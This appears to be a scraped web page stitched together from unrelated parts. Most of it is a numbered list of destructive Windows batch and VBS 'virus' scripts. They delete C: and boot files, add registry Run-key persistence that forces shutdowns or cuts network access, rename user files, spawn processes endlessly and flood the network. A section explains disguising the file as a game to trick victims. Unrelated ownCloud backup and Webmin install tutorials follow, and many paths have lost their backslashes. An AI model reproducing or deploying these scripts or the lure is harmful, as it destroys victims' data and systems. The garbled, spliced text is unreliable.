Save The Above Code As Anything.bat


No 14:-

This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next

Save It As Anything.vbs


No 15 :-

The Most Simple Virus To Crush The Window
It Only Works With Windows XP

@Echo off
Del C: *.* |y

Save It As Anything.bat


No 16 :-

Virus that crashes pc
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


Save As Anything.bat File In Notepad!!
This Will Pop Up A Message Saying OWNED!!
And Shut Down The Computer Never To Reboot Again!


No 17:-

Shutdowns Computer Every time It Is Turned On

Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE


No 18 :-

Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

Save As A bat File


No 19 :-

Change Files To Non-working TXT Files
Save As A bat File

REN *.DOC *.TXT REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

No 20 :-

System Meltdown

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
ipconfig /release
shutdown -r -f -t0
echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo YOU HAVE BEEN HACKED BITCH
REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

PAUSE

PAUSE

Save As A bat File


No 21:-

Temporarily Flood Network

:CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH

We can make a batch file which will Shutdown the computer everytime on startup !

Here is how ?

? Open Notepad

? Type :

@ECHO OFF

shutdown -s -t 10 -c "Virus Attack..."

exit

? File >> Save As...

? Name it : virus.bat

? Start >> All Programs

? Right Click on Startup >> Open

? This open the Startup folder

? Paste the Virus.bat file here !

*** That's all , now the computer will
automatically shutdown on every start up !

How to Spread it:

Windows doesn't allow to change the icon of .bat files. Therefore what you can do is :
Right click on the .bat file
Click on CREATE SHORTCUT
And hide the original file.
Now as this newly created file is just the shortcut, you can easily change its icon.
Right click on this shortcut
properties >>>..customize>>..choose icon
Now give an attractive icon to it.
Now name it something interesting. eg. PROTOTYPE or IGI etc.
Now your victim would think it to be the game , and he will be easily corrupted.

How to backup OwnCloud instance

Straight from the owncloud Administrator's manual. 

Backing up ownCloud¶

To backup an ownCloud installation there are three main things you need to retain:

1. The config folder
2. The data folder
3. The database

Backup Folders

Simply copy your config and data folder (or even your whole ownCloud install and data folder) to a place outside of your ownCloud environment. You could use this command:

rsync -Aax owncloud/ owncloud-dirbkp_`date +"%Y%m%d"`/

Backup Database

MySQL

MySQL is the recommended database engine. To backup MySQL:

mysqldump --lock-tables -h [server] -u [username] -p[password] [db_name] > owncloud-sqlbkp_`date +"%Y%m%d"`.bak

SQLite

sqlite3 data/owncloud.db .dump > owncloud-sqlbkp_`date +"%Y%m%d"`.bak

PostgreSQL

PGPASSWORD="password" pg_dump owncloud -h [server] -U [username] -f owncloud-sqlbkp_`date +"%Y%m%d"`.bak

Install Latest Webmin in Ubuntu 14.04 From Official Repository

This tutorial shows how to install the latest version of Webmin in Ubuntu Linux from its official repository.

As you may know, Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from the console or remotely.

To get started, login your remote server and follow the steps below:

1. Run below command to edit the source file:

sudo vi /etc/apt/sources.list

2. Press i on keyboard to start editing the file and add this line into the end:

deb http://download.webmin.com/download/repository sarge contrib

Press Esc to exit edit. Shift + : and followed by wq to save the changes.

3. Now execute command to download and install the key:

wget -q http://www.webmin.com/jcameron-key.asc -O- | sudo apt-key add -

4. After that, you can always use below commands to install the latest version of Webmin:

sudo apt-get update

sudo apt-get install webmin

Finally in your client’s web browser go to the webmin login page https://ubuntu-serverip:10000